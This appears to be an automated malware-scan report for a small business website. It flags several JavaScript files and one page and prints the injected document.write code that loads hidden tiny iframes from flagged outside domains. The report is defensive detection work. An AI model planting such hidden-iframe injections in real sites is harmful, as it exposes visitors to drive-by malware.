Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gmgrenovations.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gmgrenovations.com/ | 200 OK Content-Length: 12534 Content-Type: text/html | clean |
http://gmgrenovations.com/./include/url.js | 200 OK Content-Length: 169 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> | ||
http://gmgrenovations.com/./include/swfobject.js | 200 OK Content-Length: 9188 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined" ...[8543 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> Malicious iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124> | ||
http://gmgrenovations.com/./include/sitetree.js | 200 OK Content-Length: 7892 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe>'); if (typeof(decodeURIComponent) == 'undefined') { decodeURIComponent = function(s) { return unescape(s); } } function jdecode(s) { s = ...[8345 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> | ||
http://gmgrenovations.com/./2101.html | 200 OK Content-Length: 12533 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x13 src: http://nmsbaseball.com/post.php?id=298559 <iframe name=twitter scrolling=auto frameborder=no align=center height=13 width=1 src=http://nmsbaseball.com/post.php?id=298559> | ||
http://gmgrenovations.com/././include/url.js | 200 OK Content-Length: 169 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> | ||
http://gmgrenovations.com/././include/swfobject.js | 200 OK Content-Length: 9188 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined" ...[8543 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> Malicious iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124> | ||
http://gmgrenovations.com/././include/sitetree.js | 200 OK Content-Length: 7892 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe>'); if (typeof(decodeURIComponent) == 'undefined') { decodeURIComponent = function(s) { return unescape(s); } } function jdecode(s) { s = ...[8345 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> | ||
http://gmgrenovations.com/././2101.html | 200 OK Content-Length: 12533 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x13 src: http://nmsbaseball.com/post.php?id=298559 <iframe name=twitter scrolling=auto frameborder=no align=center height=13 width=1 src=http://nmsbaseball.com/post.php?id=298559> | ||
http://gmgrenovations.com/./././include/url.js | 200 OK Content-Length: 169 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> | ||
http://gmgrenovations.com/./././include/swfobject.js | 200 OK Content-Length: 9188 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined" ...[8543 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> Malicious iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124> | ||
http://gmgrenovations.com/./././include/sitetree.js | 200 OK Content-Length: 7892 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe>'); if (typeof(decodeURIComponent) == 'undefined') { decodeURIComponent = function(s) { return unescape(s); } } function jdecode(s) { s = ...[8345 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> | ||
http://gmgrenovations.com/./././2101.html | 200 OK Content-Length: 12533 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x13 src: http://nmsbaseball.com/post.php?id=298559 <iframe name=twitter scrolling=auto frameborder=no align=center height=13 width=1 src=http://nmsbaseball.com/post.php?id=298559> | ||
http://gmgrenovations.com/././././include/url.js | 200 OK Content-Length: 169 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> | ||
http://gmgrenovations.com/././././include/swfobject.js | 200 OK Content-Length: 9188 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: redsirenwebsolutions.com document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined" ...[8543 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124></iframe> Malicious iFrame found. size: 2x2 src: http://redsirenwebsolutions.com/mwed.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redsirenwebsolutions.com/mwed.html?j=1301124> Malicious iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1301124 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1301124> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gmgrenovations.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Jul 2014 01:40:17 GMT
Accept-Ranges: bytes
ETag: "30f6-4fa67c99a3b44"
Server: Apache
Content-Length: 12534
Content-Type: text/html
Last-Modified: Tue, 27 May 2014 20:46:17 GMT
...12534 bytes of data.
GET / HTTP/1.1
Host: gmgrenovations.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Jul 2014 01:40:17 GMT
Accept-Ranges: bytes
ETag: "30f6-4fa67c99a3b44"
Server: Apache
Content-Length: 12534
Content-Type: text/html
Last-Modified: Tue, 27 May 2014 20:46:17 GMT
...12534 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gmgrenovations.com
Referer: http://www.google.com/search?q=gmgrenovations.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gmgrenovations.com
Referer: http://www.google.com/search?q=gmgrenovations.com
Result:
The result is similar to the first query. There are no suspicious redirects found.